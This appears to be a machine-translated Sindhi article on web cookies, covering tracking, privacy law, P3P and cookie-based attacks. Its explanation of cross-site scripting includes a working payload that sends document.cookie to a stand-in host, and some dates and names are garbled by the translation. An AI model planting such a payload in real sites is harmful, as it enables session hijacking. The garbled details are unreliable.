ڪوڪيز ويب استعمال ڪندڙن جي رازداري ۽ گمنامي لاءِ اهم اثر رکن ٿيون. جيتوڻيڪ ڪوڪيز صرف سرور ڏانهن واپس موڪليا ويندا آهن جيڪي انهن کي سيٽ ڪن ٿا يا هڪ سرور ڏانهن جيڪو ساڳيو انٽرنيٽ ڊومين سان تعلق رکي ٿو، هڪ ويب پيج شايد تصويرن يا ٻين حصن تي مشتمل هجي جيڪي ٻين ڊومينز سان تعلق رکندڙ سرور تي محفوظ ٿيل آهن. اهي ڪوڪيز جيڪي انهن خارجي اجزاء جي وصولي دوران مقرر ڪيا ويا آهن سڏيو ويندو آهي ٽئين پارٽي ڪوڪيز. ھن ۾ ناپسنديده پاپ اپ ونڊوز مان ڪوڪيز شامل آھن.

اشتهاري ڪمپنيون ٽئين پارٽي ڪوڪيز استعمال ڪن ٿيون صارفين کي ٽريڪ ڪرڻ لاءِ انهن مختلف سائيٽن تي جيڪي اهي دورو ڪن ٿا. خاص طور تي، هڪ اشتهاري ڪمپني صارف کي سڀني صفحن تي ٽريڪ ڪري سگهي ٿي جتي هن اشتهارن جون تصويرون يا ٽريڪنگ پکسل رکيا آهن. صارف پاران دورو ڪيل صفحن جي ڄاڻ، اشتهار سازي ڪمپني کي صارف جي اشتهارن جي ترجيحن کي ھدف ڪرڻ جي اجازت ڏئي ٿي.

يوزر پروفائل ٺاهڻ جي صلاحيت کي ڪجھ سمجھيو وڃي ٿو پرائيويسي تي حملو، خاص طور تي جڏھن ٽريڪنگ ڪئي ويندي آھي مختلف ڊومينز تي ٽئين پارٽي ڪوڪيز استعمال ڪندي. انهي سبب لاء، ڪجهه ملڪن ۾ ڪوڪي قانون سازي آهي.

آمريڪي حڪومت 2000 ۾ ڪوڪيز جي جاءِ تي سخت ضابطا لاڳو ڪيا، ان بعد انڪشاف ٿيو ته وائيٽ هائوس ڊرگ پاليسي آفيس آن لائين دوائن جا اشتهار ڏسڻ وارن صارفين جي ڪمپيوٽرن کي ٽريڪ ڪرڻ لاءِ ڪوڪيز استعمال ڪري رهي هئي. 2002 ۾، رازداري جي سرگرم ڪارڪن ڊينيل برانڊٽ دريافت ڪيو ته سي آء اي ڪمپيوٽرن تي مسلسل ڪوڪيز ڇڏيا آهن جيڪي هن جي ويب سائيٽن جو دورو ڪيو هو. هڪ دفعو هن خلاف ورزي جي ڄاڻ، سي آء اي اعلان ڪيو ته اهي ڪوڪيز ڄاڻي واڻي نه موڪليا ويا ۽ انهن کي ترتيب ڏيڻ بند ڪيو. 25 ڊسمبر، 2005 تي، برانڊٽ دريافت ڪيو ته نيشنل سيڪيورٽي ايجنسي (NSA) هڪ سافٽ ويئر اپڊيٽ جي ڪري ٻه مسلسل ڪوڪيز سنڌين جي ڪمپيوٽرن تي ڇڏيا آهن. اطلاع ٿيڻ کان پوء، NSA فوري طور تي ڪوڪيز کي بند ڪري ڇڏيو.

برطانيه ۾، جي ڪوڪي قانون "، 25 مئي 2012 تي لاڳو ٿيو، سائيٽن کي پابند ڪري ٿو ته انهن جي ارادن جو اعلان ڪن، اهڙيء طرح صارفين کي چونڊڻ جي اجازت ڏئي ٿي ته اهي انٽرنيٽ تي انهن جي گذرڻ جا نشان ڇڏڻ چاهين ٿا يا نه. اهي اهڙيء طرح اشتهارن جي ٽارگيٽ کان محفوظ ٿي سگهن ٿا. بهرحال، جي مطابق جي سرپرست, انٽرنيٽ استعمال ڪندڙن جي رضامندي ضروري طور تي واضح نه آهي؛ صارف جي رضامندي جي شرطن ۾ تبديليون ڪيون ويون آهن، ان کي ٺاهڻ اهڙيء طرح اشارو.

هدايت 2002/58 رازداري تي

هدايت 202/58 رازداري ۽ اليڪٽرانڪ مواصلات، ڪوڪيز جي استعمال تي ضابطن تي مشتمل آهي. خاص طور تي، آرٽيڪل 5، هن هدايت جي پيراگراف 3 جي ضرورت آهي ته ڊيٽا جي اسٽوريج (جهڙوڪ ڪوڪيز) صارف جي ڪمپيوٽر ۾ صرف ٿي سگهي ٿي جيڪڏهن:

  • صارف کي ڄاڻ ڏني وئي آهي ته ڊيٽا ڪيئن استعمال ٿئي ٿي؛
  • استعمال ڪندڙ کي اختيار ڏنو ويو آهي هن اسٽوريج آپريشن کي رد ڪرڻ جو. بهرحال، هي آرٽيڪل پڻ ٻڌائي ٿو ته ٽيڪنيڪل سببن لاء ڊيٽا جي اسٽوريج هن قانون کان مستثني آهي.

آڪٽوبر 2003 کان لاڳو ٿيڻ جي ڪري، ڊسمبر 2004 جي هڪ رپورٽ موجب، هدايتن کي صرف انتهائي ناقص طور تي عمل ۾ آندو ويو، جنهن ۾ اهو پڻ اشارو ڪيو ويو ته ڪجهه ميمبر رياستن (سلوواڪيا، لاتويا، يونان، بيلجيم ۽ لگزمبرگ) اڃا تائين منتقلي نه ڪئي هئي. ملڪي قانون ۾ هدايت.

29 ۾ G2010 جي راء جي مطابق، هي هدايت، جيڪو خاص طور تي رويي جي اشتهارن جي مقصدن لاء ڪوڪيز جي استعمال جي شرطن تي، انٽرنيٽ استعمال ڪندڙ جي واضح رضامندي تي تمام خراب طور تي لاڳو ٿئي ٿو. حقيقت ۾، گهڻيون سائيٽون اهڙي طريقي سان ڪن ٿيون جيڪي هدايتن جي تعميل نه ڪنديون آهن، پاڻ کي هڪ سادي "بينر" تائين محدود ڪندي، "ڪوڪيز" جي استعمال جي ڄاڻ ڏيڻ کان سواء، استعمال جي معلومات ڏيڻ کان سواء، "ٽيڪنيڪل" ڪوڪيز جي وچ ۾ فرق ڪرڻ کان سواء. "ٽريڪنگ" ڪوڪيز، ۽ نه ئي ٽيڪنيڪل ڪوڪيز (جهڙوڪ شاپنگ ڪارٽ مئنيجمينٽ ڪوڪيز) کي برقرار رکڻ جي خواهش رکندڙ صارف کي حقيقي انتخاب پيش ڪرڻ ۽ "ٽريڪنگ" ڪوڪيز کي رد ڪرڻ. حقيقت ۾، ڪيتريون ئي سائيٽون صحيح طريقي سان ڪم نه ڪن ٿيون جيڪڏهن ڪوڪيز کي رد ڪيو وڃي، جيڪو هدايت 2002/58 يا هدايت 95/46 (ذاتي ڊيٽا جو تحفظ) سان عمل نٿو ڪري.

ھدايت 2009/136/CE

هن مواد کي اپڊيٽ ڪيو ويو آهي هدايت 2009/136/EC تاريخ 25 نومبر 2009 جنهن ۾ چيو ويو آهي ته "معلومات جو ذخيرو، يا اڳ ۾ ئي محفوظ ڪيل معلومات تائين رسائي حاصل ڪرڻ، هڪ سبسڪرائبر يا صارف جي ٽرمينل سامان ۾ صرف ان شرط تي اجازت آهي ته. سبسڪرائبر يا صارف پنهنجي رضامندي ڏني آهي، حاصل ڪرڻ کان پوء، هدايت 95/46/EC جي تعميل ۾، صاف ۽ مڪمل معلومات، پروسيسنگ جي مقصدن تي ٻين جي وچ ۾. تنهن ڪري نئون هدايتون انٽرنيٽ استعمال ڪندڙ جي ڪمپيوٽر تي ڪوڪيز رکڻ کان اڳ جي ذميوارين کي مضبوط ڪري ٿي.

هدايتن جي ابتدائي خيالن ۾، يورپي قانون ساز بيان ڪري ٿو: "جتي ٽيڪنالاجي طور ممڪن ۽ موثر، هدايت 95/46/EC جي لاڳاپيل شقن جي مطابق، پروسيسنگ جي حوالي سان صارف جي رضامندي جو اظهار ڪري سگهجي ٿو. برائوزر يا ٻي ايپليڪيشن جي مناسب سيٽنگن جو استعمال". پر حقيقت ۾، اڄ تائين ڪو به برائوزر اهو ممڪن نه ٿو بڻائي ته ضروري ٽيڪنيڪل ڪوڪيز کي اختياري کان الڳ ڪري، جنهن کي صارف جي پسند تي ڇڏي ڏنو وڃي.

ھي نئون ھدايت بيلجيم جي ايم پي ايز پاران جولاءِ 2012 ۾ منتقل ڪيو ويو. ھڪڙو 2014 مطالعو ڏيکاري ٿو ته ايستائين جو ايم پي ايز لاڳو ڪرڻ لاءِ جدوجهد ڪن ٿا. هدايتن جي پابنديون.

P3P

P3P وضاحتن ۾ شامل آهي سرور جي صلاحيت هڪ رازداري پاليسي بيان ڪرڻ جي، جيڪا وضاحت ڪري ٿي ته اها ڪهڙي قسم جي معلومات گڏ ڪري ٿي ۽ ڪهڙي مقصد لاءِ. انهن پاليسين ۾ شامل آهن (پر ان تائين محدود نه آهن) ڪوڪيز استعمال ڪندي گڏ ڪيل معلومات جو استعمال. P3P جي وصفن جي مطابق، برائوزر ڪوڪيز کي قبول يا رد ڪري سگھي ٿو پرائيويسي پاليسين جو استعمال ڪندڙ جي ترجيحن سان مقابلو ڪندي يا صارف کان پڇڻ سان، سرور پاران اعلان ڪيل رازداري پاليسي رازداري بيان پيش ڪندي.

ڪيترائي برائوزر، بشمول ايپل سفاري ۽ Microsoft انٽرنيٽ ايڪسپلورر ورجن 6 ۽ 7، سپورٽ ڪن ٿا P3P جيڪو برائوزر کي اجازت ڏئي ٿو ته اهو طئي ڪري ته ٽئين پارٽي ڪوڪي اسٽوريج کي قبول ڪيو وڃي يا نه. اوپيرا برائوزر صارفين کي ٽئين پارٽي ڪوڪيز کي رد ڪرڻ ۽ انٽرنيٽ ڊومينز لاءِ عالمي ۽ مخصوص سيڪيورٽي پروفائل ٺاهڻ جي اجازت ڏئي ٿو. Mozilla Firefox ورجن 2 P3P سپورٽ ختم ڪئي پر ان کي ورزن 3 ۾ بحال ڪيو.

ٽئين پارٽي ڪوڪيز کي بلاڪ ڪري سگهجي ٿو اڪثر برائوزرن طرفان رازداري کي وڌائڻ ۽ اشتهارن جي ٽريڪنگ کي گهٽائڻ لاءِ، صارف جي ويب تجربي تي منفي اثر انداز ٿيڻ کان سواءِ. ڪيتريون ئي اشتهارسازي ايجنسيون هڪ اختيار پيش ڪن ٿيون چونڊڻ ٽارگيٽ ڪيل اشتهارن لاءِ، برائوزر ۾ هڪ عام ڪوڪي قائم ڪرڻ سان جيڪا هن ٽارگيٽنگ کي غير فعال ڪري ٿي، پر اهڙو حل عملي طور تي اثرائتو نه هوندو آهي، جڏهن ان جو احترام ڪيو ويندو آهي، ڇاڪاڻ ته هي عام ڪوڪيز ان وقت ختم ٿي ويندي آهي جيئن صارف انهن ڪوڪيز کي حذف ڪري ڇڏيندو آهي، جيڪا آپٽ کي رد ڪري ٿي. ٻاهر جو فيصلو.

ڪوڪيز جا نقصان

رازداري جي مسئلن کان علاوه، ڪوڪيز ۾ پڻ ڪجهه ٽيڪنيڪل خرابيون آهن. خاص طور تي، اهي هميشه صحيح طور تي استعمال ڪندڙن جي سڃاڻپ نٿا ​​ڪن، اهي سائيٽ جي ڪارڪردگي کي سست ڪري سگهن ٿا جڏهن وڏي تعداد ۾، اهي سيڪيورٽي حملن لاء استعمال ڪري سگھجن ٿيون، ۽ اهي نمائندي رياست جي منتقلي، سافٽ ويئر جي تعميراتي انداز سان تڪرار ڪن ٿا.

اڻ سڌي سڃاڻپ

جيڪڏهن ڪمپيوٽر تي هڪ کان وڌيڪ برائوزر استعمال ڪيا وڃن، انهن مان هر هڪ ۾ هميشه ڪوڪيز لاءِ الڳ اسٽوريج يونٽ هوندو آهي. تنهن ڪري ڪوڪيز هڪ شخص جي سڃاڻپ نه ڪندا آهن، پر هڪ صارف کاتي، هڪ ڪمپيوٽر، ۽ هڪ ويب برائوزر جو ميلاپ. اهڙيء طرح، ڪو به ماڻهو انهن اڪائونٽن، ڪمپيوٽرن، يا برائوزرن کي استعمال ڪري سگهي ٿو جن وٽ ڪوڪيز جو panoply آهي. اهڙي طرح، ڪوڪيز هڪ کان وڌيڪ استعمال ڪندڙن جي وچ ۾ فرق نه ڪنديون آهن جيڪي هڪ ئي صارف اڪائونٽ، ڪمپيوٽر ۽ برائوزر کي حصيداري ڪندا آهن، جهڙوڪ "انٽرنيٽ ڪيفي" يا ڪمپيوٽر جي وسيلن تائين مفت پهچ ڏيڻ واري ڪنهن به جڳهه ۾.

پر عملي طور تي اهو بيان اڪثر ڪيسن ۾ غلط ثابت ٿئي ٿو، ڇاڪاڻ ته اڄڪلهه هڪ ”ذاتي“ ڪمپيوٽر (يا سمارٽ فون، يا ٽيبليٽ، جيڪو وڌيڪ خراب آهي) خاص طور تي هڪ فرد طرفان استعمال ٿيندو آهي، اهو هڪ خاص شخص کي نشانو بڻائڻ جي برابر آهي. گڏ ڪيل معلومات جي مقدار جي ذريعي ذاتي ٽارگيٽ تائين پهچي ٿو، جيتوڻيڪ اهو شخص "نالي" جي سڃاڻپ نه آهي.

هڪ ڪوڪي چوري ٿي سگهي ٿو نيٽ ورڪ تي ٻئي ڪمپيوٽر طرفان.

عام آپريشن دوران، ڪوڪيز واپس موڪليا ويندا آهن سرور جي وچ ۾ (يا ساڳئي ڊومين ۾ سرور جو هڪ گروپ) ۽ صارف جي ڪمپيوٽر برائوزر جي وچ ۾. جيئن ته ڪوڪيز ۾ حساس معلومات شامل ٿي سگھي ٿي (استعمال ڪندڙ نالو، تصديق لاءِ استعمال ٿيل پاسورڊ وغيره)، انهن جا قدر ٻين ڪمپيوٽرن تائين پهچ نه هجڻ گهرجن. ڪوڪيز چوري هڪ غير مجاز ٽئين پارٽي طرفان ڪوڪيز جي مداخلت جو عمل آهي.

ڪوڪيز چوري ڪري سگھجن ٿيون پيڪٽ سنيفر ذريعي حملي ۾ جنهن کي سيشن هائيجيڪنگ سڏيو ويندو آهي. نيٽ تي ٽريفڪ کي روڪي سگھجي ٿو ۽ ڪمپيوٽرن ذريعي پڙھي سگھجي ٿو سواءِ موڪلڻ ۽ وصول ڪرڻ وارن (خاص طور تي غير انڪرپٽ ٿيل عوامي وائي فائي اسپيس تي). ھن ٽريفڪ ۾ ڪوڪيز شامل آھن سيشنن تي موڪليل سادي HTTP پروٽوڪول استعمال ڪندي. جڏهن نيٽ ورڪ ٽرئفڪ انڪريپٽ نه ڪئي وئي آهي، خراب استعمال ڪندڙ اهڙيء طرح نيٽ ورڪ تي "پيڪٽ سنيفرز" استعمال ڪندي ٻين صارفين جي ڪميونيڪيشن کي پڙهي سگهن ٿا.

اهو مسئلو HTTPS پروٽوڪول استعمال ڪندي صارف جي ڪمپيوٽر ۽ سرور جي وچ ۾ ڪنيڪشن کي انڪرپٽ ڪندي ختم ڪري سگهجي ٿو. هڪ سرور وضاحت ڪري سگهي ٿو a محفوظ پرچم ڪوڪي ترتيب ڏيڻ دوران؛ برائوزر ان کي صرف هڪ محفوظ لائن تي موڪليندو، جهڙوڪ SSL ڪنيڪشن.

جيتوڻيڪ ڪيتريون ئي سائيٽون، جيتوڻيڪ استعمال ڪندي HTTPS انڪرپٽ ٿيل ڪميونيڪيشن صارف جي تصديق لاءِ (يعني لاگ ان پيج)، بعد ۾ سيشن ڪوڪيز ۽ ٻيو ڊيٽا عام طور تي موڪلين ٿيون، ڪارڪردگي سببن لاءِ غير انڪريٽ ٿيل HTTP ڪنيڪشن ذريعي. حملو ڪندڙ اهڙيءَ طرح ٻين صارفين جي ڪوڪيز کي روڪي سگهن ٿا ۽ انهن کي مناسب سائيٽن تي نقل ڪري سگهن ٿا يا انهن کي ڪوڪي حملن ۾ استعمال ڪري سگهن ٿا.

سائيٽ ۾ اسڪرپٽ: هڪ ڪوڪي جيڪا صرف سرور ۽ ڪلائنٽ جي وچ ۾ مٽائي وڃي ٻي ٽئين پارٽي ڏانهن موڪلي وئي آهي.

ڪوڪيز کي چوري ڪرڻ جو ٻيو طريقو آهي اسڪرپٽ سائيٽس ۽ برائوزر پاڻ ئي ڪوڪيز کي بدسلوڪي سرورن ڏانهن موڪلي ٿو جيڪي ڪڏهن به وصول نه ڪندا آهن. جديد برائوزر سرور کان ڪوڊ جي گهربل حصن تي عمل ڪرڻ جي اجازت ڏين ٿا. جيڪڏهن ڪوڪيز رن ٽائم دوران پهچن ٿيون، انهن جون قيمتون ڪنهن نه ڪنهن صورت ۾ سرور تائين پهچائي سگهجن ٿيون جيڪي انهن تائين رسائي نٿا ڪن. نيٽ ورڪ تي موڪلڻ کان اڳ ڪوڪيز کي انڪرپٽ ڪرڻ حملي کي ناڪام ڪرڻ ۾ مدد نه ڪندو آهي.

ھن قسم جي ان-سائيٽ اسڪرپٽنگ عام طور تي سائيٽن تي حملي ڪندڙن پاران استعمال ڪئي ويندي آھي جيڪي صارفين کي HTML مواد پوسٽ ڪرڻ جي اجازت ڏين ٿيون. HTML تعاون ۾ مطابقت واري ڪوڊ جي ھڪڙي حصي کي ضم ڪرڻ سان، ھڪڙو حملو ڪندڙ ٻين استعمال ڪندڙن کان ڪوڪيز حاصل ڪري سگھن ٿا. انهن ڪوڪيز جي ڄاڻ چوري ٿيل ڪوڪيز کي استعمال ڪندي هڪ ئي سائيٽ سان ڳنڍڻ سان استعمال ڪري سگهجي ٿي، اهڙيءَ طرح ان صارف جي سڃاڻپ ٿي سگهي ٿي جنهن جون ڪوڪيز چوري ٿي ويون.

اهڙن حملن کي روڪڻ جو هڪ طريقو آهي HttpOnly پرچم استعمال ڪرڻ؛ اهو هڪ آپشن آهي، جيڪو PHP ۾ انٽرنيٽ ايڪسپلورر جي ورزن 6 کان وٺي ورجن 5.2.0 کان متعارف ڪرايو ويو آهي، جنهن جي رٿابندي ڪئي وئي آهي ته ڪوڪيز کي اسڪرپٽ جي ويجھو ڪلائنٽ تائين پهچ نه ٿي سگھي. بهرحال، ويب ڊولپرز کي گهرجي ته هن کي پنهنجي سائيٽ جي ترقي ۾ حساب ۾ رکڻ گهرجي ته جيئن اهي سائيٽ ۾ اسڪرپٽ ڪرڻ کان محفوظ آهن.

هڪ ٻيو سيڪيورٽي خطرو استعمال ڪيو ويو آهي سائيٽ ۾ گهربل ٺاهه.

سرڪاري ٽيڪنيڪل وضاحتون ڪوڪيز کي اجازت ڏئي ٿي ته اهي واپس موڪليا وڃن صرف ڊومين جي سرورن ڏانهن جن مان اهي پيدا ٿيا آهن. جڏهن ته، ڪوڪيز جي قيمت ٻين سرورن ڏانهن موڪلي سگھجي ٿو ڪوڪيز هيڊرز کان سواءِ ٻيو مطلب استعمال ڪندي.

خاص طور تي، جاوا اسڪرپٽ وانگر اسڪرپٽنگ ٻولين کي عام طور تي ڪوڪيز جي قدرن تائين رسائي حاصل ڪرڻ جي اجازت ڏني وئي آهي ۽ انٽرنيٽ تي ڪنهن به سرور ڏانهن صوابديدي قدر موڪلڻ جي قابل آهن. هي اسڪرپٽنگ جي صلاحيت ويب سائيٽن مان استعمال ڪئي وئي آهي صارفين کي HTML مواد پوسٽ ڪرڻ جي ٻين صارفين کي ڏسڻ لاء.

مثال طور، هڪ حملو ڪندڙ example.com ڊومين تي ڪم ڪري سگهي ٿو تبصرو پوسٽ ڪري سگهي ٿو جنهن ۾ هيٺ ڏنل لنڪ هڪ مشهور بلاگ ڏانهن اشارو ڪندي جيڪا ٻي صورت ۾ ڪنٽرول نه ڪندا آهن:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

جڏهن ڪو ٻيو استعمال ڪندڙ هن لنڪ تي ڪلڪ ڪري ٿو، برائوزر ڪوڊ جي onclick انتساب واري حصي تي عمل ڪري ٿو، تنهنڪري اهو document.cookie string کي تبديل ڪري ٿو صارف جي ڪوڪيز جي فهرست سان جيڪي هن صفحي لاءِ سرگرم آهن. تنهن ڪري، ڪوڪيز جي هي فهرست example.com سرور ڏانهن موڪلي وئي آهي، ۽ حملي ڪندڙ ان ڪري هن صارف جي ڪوڪيز کي گڏ ڪرڻ جي قابل آهي.

هن قسم جي حملي کي صارف جي پاسي کان معلوم ڪرڻ ڏکيو آهي ڇو ته اسڪرپٽ ساڳئي ڊومين مان اچي ٿي جيڪا ڪوڪيز کي سيٽ ڪري ٿي، ۽ قيمت موڪلڻ جو آپريشن ظاهر ٿئي ٿو ته ان ڊومين طرفان اختيار ڪيل آهي. اهو سمجهيو وڃي ٿو ته هن قسم جي سائيٽ کي هلائيندڙ منتظمين جي ذميواري آهي ته بدسلوڪي ڪوڊ جي اشاعت کي روڪڻ لاءِ پابنديون لاڳو ڪن.

ڪوڪيز جاوا اسڪرپٽ وانگر ڪلائنٽ سائڊ پروگرامن تي سڌو سنئون نظر نه اينديون آهن جيڪڏهن اهي HttpOnly پرچم سان موڪليا ويا آهن. سرور جي نقطي نظر کان، فرق صرف اهو آهي ته Set-Cookie هيڊر جي قطار ۾ هڪ نئين فيلڊ شامل ڪئي وئي آهي جنهن ۾ اسٽرنگ HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

جڏهن برائوزر کي اهڙي ڪوڪي ملي ٿي، ته ان کي عام طور تي هيٺين HTTP مٽاسٽا ۾ استعمال ڪرڻ گهرجي، پر ان کي ڪلائنٽ جي پاسي تي عمل ڪيل اسڪرپٽس کي ڏسڻ جي بغير. HttpOnly پرچم ڪنهن به سرڪاري ٽيڪنيڪل وضاحت جو حصو نه آهي، ۽ سڀني برائوزرن ۾ لاڳو نه ڪيو ويو آهي. ياد رهي ته في الحال ڪوبه طريقو ناهي ته سيشن ڪوڪيز پڙهڻ ۽ لکڻ کان روڪيو وڃي XMLHTTPRequest طريقي سان.

مواد جي تبديلي: هڪ حملو ڪندڙ سرور ڏانهن غلط ڪوڪي موڪلي ٿو، ممڪن طور تي سرور طرفان موڪليل صحيح ڪوڪيز مان ٺاهيو ويو آهي.

جيترو جلدي ڪوڪيز کي ذخيرو ڪرڻ جي ضرورت آهي ۽ سرور ڏانهن اڻڄاتل موٽڻ جي ضرورت آهي، هڪ حملي ڪندڙ ڪوڪيز جي قيمت کي تبديل ڪري سگهي ٿو ان کان اڳ اهي سرور ڏانهن واپس موڪليا وڃن. مثال طور، جيڪڏهن ڪوڪيز ۾ مجموعي قيمت شامل آهي صارف کي اسٽور جي شاپنگ ڪارٽ ۾ رکيل شيون لاءِ ادا ڪرڻي آهي، هن قيمت کي تبديل ڪرڻ سرور کي بي نقاب ڪري ٿو ته حملي ڪندڙ کي شروعاتي قيمت کان گهٽ چارج ڪرڻ جو خطرو. ڪوڪيز جي قيمت کي تبديل ڪرڻ جي عمل کي سڏيو ويندو آهي ڪوڪيز زهر ڏيڻ ۽ استعمال ڪري سگھجي ٿو ڪوڪيز جي چوري کان پوءِ حملي کي جاري رکڻ لاءِ.

ڪوڪي اوور رائڊ جي طريقي ۾، حملي ڪندڙ برائوزر جي خرابي جو استحصال ڪري ٿو سرور ڏانهن غلط ڪوڪي موڪلڻ لاءِ.

اڪثر ويب سائيٽون، جڏهن ته، صرف هڪ سيشن ID محفوظ ڪنديون آهن - هڪ بي ترتيب ٺاهيل منفرد نمبر جيڪو سيشن استعمال ڪندڙ کي سڃاڻڻ لاءِ استعمال ڪيو ويندو آهي - خود ڪوڪيز ۾، جڏهن ته ٻي سموري معلومات سرور تي محفوظ ٿيل هوندي آهي. انهي حالت ۾، اهو مسئلو گهڻو ڪري حل ڪيو ويو آهي.

هر سائيٽ کي پنهنجي ڪوڪيز جي توقع آهي، تنهنڪري هڪ سائيٽ کي تبديل ڪرڻ يا ٻي سائيٽ سان لاڳاپيل ڪوڪيز ٺاهڻ جي قابل نه هجڻ گهرجي. هڪ ويب برائوزر سيڪيورٽي نقص بدسلوڪي سائيٽن کي هن قاعدي کي ٽوڙڻ جي اجازت ڏئي سگهي ٿي. اهڙي فالٽ جي استحصال کي عام طور تي سڏيو ويندو آهي پار سائيٽ پچائڻ. اهڙن حملن جو مقصد ٿي سگهي ٿو سيشن جي سڃاڻپ چوري.

صارفين کي ويب برائوزرن جي جديد ورزن کي استعمال ڪرڻ گهرجي جنهن ۾ اهي خطرات عملي طور تي ختم ٿي ويا آهن.

ڪلائنٽ ۽ سرور جي وچ ۾ تڪرار واري حالت

ڪوڪيز جو استعمال ڪلائنٽ جي حالت ۽ ڪوڪيز ۾ رکيل رياست جي وچ ۾ تضاد پيدا ڪري سگھي ٿو. جيڪڏهن صارف ڪوڪي حاصل ڪري ٿو ۽ برائوزر جي "واپس" بٽڻ تي ڪلڪ ڪري ٿو، برائوزر جي حالت عام طور تي ساڳي نه هوندي آهي جيئن هن حصول کان اڳ. مثال طور، جيڪڏهن ڪوڪيز استعمال ڪندي هڪ آن لائن اسٽور جي ٽوڪري ٺاهي وئي آهي، ٽوڪري جو مواد تبديل نٿو ڪري سگهي جڏهن صارف برائوزر جي تاريخ ڏانهن واپس اچي ٿو: جيڪڏهن صارف پنهنجي ٽوڪري ۾ آرٽيڪل شامل ڪرڻ لاءِ بٽڻ دٻائي ٿو ۽ "واپسي" تي ڪلڪ ڪري ٿو. "بٽڻ، مضمون هن ۾ رهي ٿو. اهو شايد صارف جو ارادو نه آهي، جيڪو ضرور آرٽيڪل جي اضافي کي منسوخ ڪرڻ چاهي ٿو. اهو ٿي سگهي ٿو ناقابل اعتبار، مونجهارو، ۽ ڪيڙا. تنهن ڪري ويب ڊولپرز کي هن مسئلي کان آگاهي ٿيڻ گهرجي ۽ اهڙين حالتن کي سنڀالڻ لاءِ قدمن تي عمل ڪرڻ گهرجي.

پرائيويسي سيڪيورٽي ماهرن پاران مسلسل ڪوڪيز تي تنقيد ڪئي وئي آهي ته انهن کي مقرر نه ڪيو وڃي ته اهي جلد ئي ختم ٿي وڃن، ان ڪري ويب سائيٽن کي صارفين کي ٽريڪ ڪرڻ ۽ وقت سان گڏ انهن جي پروفائل ٺاهڻ جي اجازت ڏني وئي آهي. ڪوڪيز جو هي پاسو پڻ سيشن جي هائيجيڪنگ جي مسئلي جو حصو آهي، ڇاڪاڻ ته هڪ چوري ٿيل مسلسل ڪوڪي استعمال ڪري سگهجي ٿي هڪ صارف کي وڏي عرصي تائين نقل ڪرڻ لاءِ.

پڙهڻ لاء پڻ: گفام: اهي ڪير آهن؟ اهي ڇو آهن (ڪڏهن ڪڏهن) ايترو خوفناڪ؟

ڪوڪيز جا متبادل

ڪجھ آپريشنز جيڪي ڪوڪيز استعمال ڪندي سرانجام ڏئي سگھجن ٿيون، ٻيون ميکانيزم استعمال ڪندي پڻ ڪري سگھجن ٿيون جيڪي ڪوڪيز کي نظرانداز ڪن ٿيون يا ڊليٽ ٿيل ڪوڪيز کي ٻيهر ٺاھين ٿيون، جيڪي رازداري جا مسئلا ساڳيءَ طرح پيدا ڪن ٿيون (يا ڪڏھن ڪڏھن بدتر ڇو ته پوءِ پوشيده) ڪوڪيز کان.

IP پتي

صارفين کي ٽريڪ ڪري سگھجي ٿو ڪمپيوٽر جي IP پتي سان صفحي کي ڪال ڪندي. هي ٽيڪنڪ ورلڊ وائڊ ويب جي متعارف ٿيڻ کان وٺي دستياب آهي، جيئن صفحا ڊائون لوڊ ڪيا ويندا آهن سرور درخواست ڪري ٿو IP پتي جي ڪمپيوٽر جو برائوزر هلائيندڙ يا پراکسي، جيڪڏهن ڪو به استعمال نه ڪيو وڃي. سرور هن معلومات کي ٽريڪ ڪري سگهي ٿو ته ڪوڪيز استعمال ۾ آهن يا نه. بهرحال، اهي ايڊريس عام طور تي ڪوڪيز جي ڀيٽ ۾ صارف کي سڃاڻڻ ۾ گهٽ معتبر هوندا آهن ڇاڪاڻ ته ڪمپيوٽرن ۽ پراڪسز کي ڪيترن ئي استعمال ڪندڙن طرفان حصيداري ڪري سگهجي ٿو، ۽ ساڳئي ڪمپيوٽر کي هر ڪم جي سيشن تي مختلف IP پتو ملي سگهي ٿو (جيئن ته c اڪثر ڪري ٽيليفون ڪنيڪشن لاءِ ڪيس) .

IP پتي جي ذريعي ٽريڪ ڪرڻ ڪجهه حالتن ۾ قابل اعتماد ٿي سگهي ٿو، جهڙوڪ براڊ بينڊ ڪنيڪشن جيڪي هڪ ئي IP پتي کي ڊگهي وقت تائين برقرار رکندا آهن، جيستائين طاقت هلندي آهي.

ڪجھ سسٽم جهڙوڪ Tor انٽرنيٽ جي گمنام کي برقرار رکڻ ۽ IP پتي جي ذريعي ٽريڪنگ کي ناممڪن يا غير عملي بڻائڻ لاء ٺهيل آهن.

URL جو

وڌيڪ صحيح ٽيڪنڪ URLs ۾ شامل ڪيل معلومات تي ٻڌل آهي. URL جو سوال اسٽرنگ حصو ھڪڙو ٽيڪنڪ آھي جيڪو عام طور تي ھن مقصد لاء استعمال ڪيو ويندو آھي، پر ٻيا حصا پڻ استعمال ڪري سگھجن ٿا. ٻئي جاوا سرورليٽ ۽ PHP سيشن ميڪانيزم هي طريقو استعمال ڪندا آهن جيڪڏهن ڪوڪيز فعال نه آهن.

ھن طريقي ۾ شامل آھي ويب سرور ويب پيج جي لنڪن تي اسٽرنگ درخواستن کي شامل ڪري ٿو جيڪو ان کي کڻندو آھي جڏھن اھو برائوزر ڏانھن موڪليو ويندو آھي. جڏهن صارف هڪ لنڪ جي پيروي ڪري ٿو، برائوزر سرور ڏانهن منسلڪ سوال اسٽرنگ واپس ڪري ٿو.

هن مقصد لاءِ استعمال ٿيل پڇا ڳاڇا اسٽرنگ ۽ ڪوڪيز تمام گهڻيون هڪجهڙائيون آهن، ٻئي معلومات پنهنجي مرضيءَ سان سرور طرفان چونڊيل آهن ۽ برائوزر طرفان واپس ڪيل آهن. تنهن هوندي، ڪجھ اختلاف آهن: جڏهن هڪ URL جنهن ۾ هڪ سوال واري اسٽرنگ کي ٻيهر استعمال ڪيو ويندو آهي، ساڳئي معلومات سرور ڏانهن موڪلي ويندي آهي. مثال طور، جيڪڏهن هڪ صارف جون ترجيحات هڪ URL جي سوال واري اسٽرنگ ۾ انڪوڊ ٿيل آهن ۽ صارف اهو URL ڪنهن ٻئي صارف کي اي ميل ذريعي موڪلي ٿو، ته اهو صارف پڻ انهن ترجيحن کي استعمال ڪرڻ جي قابل هوندو.

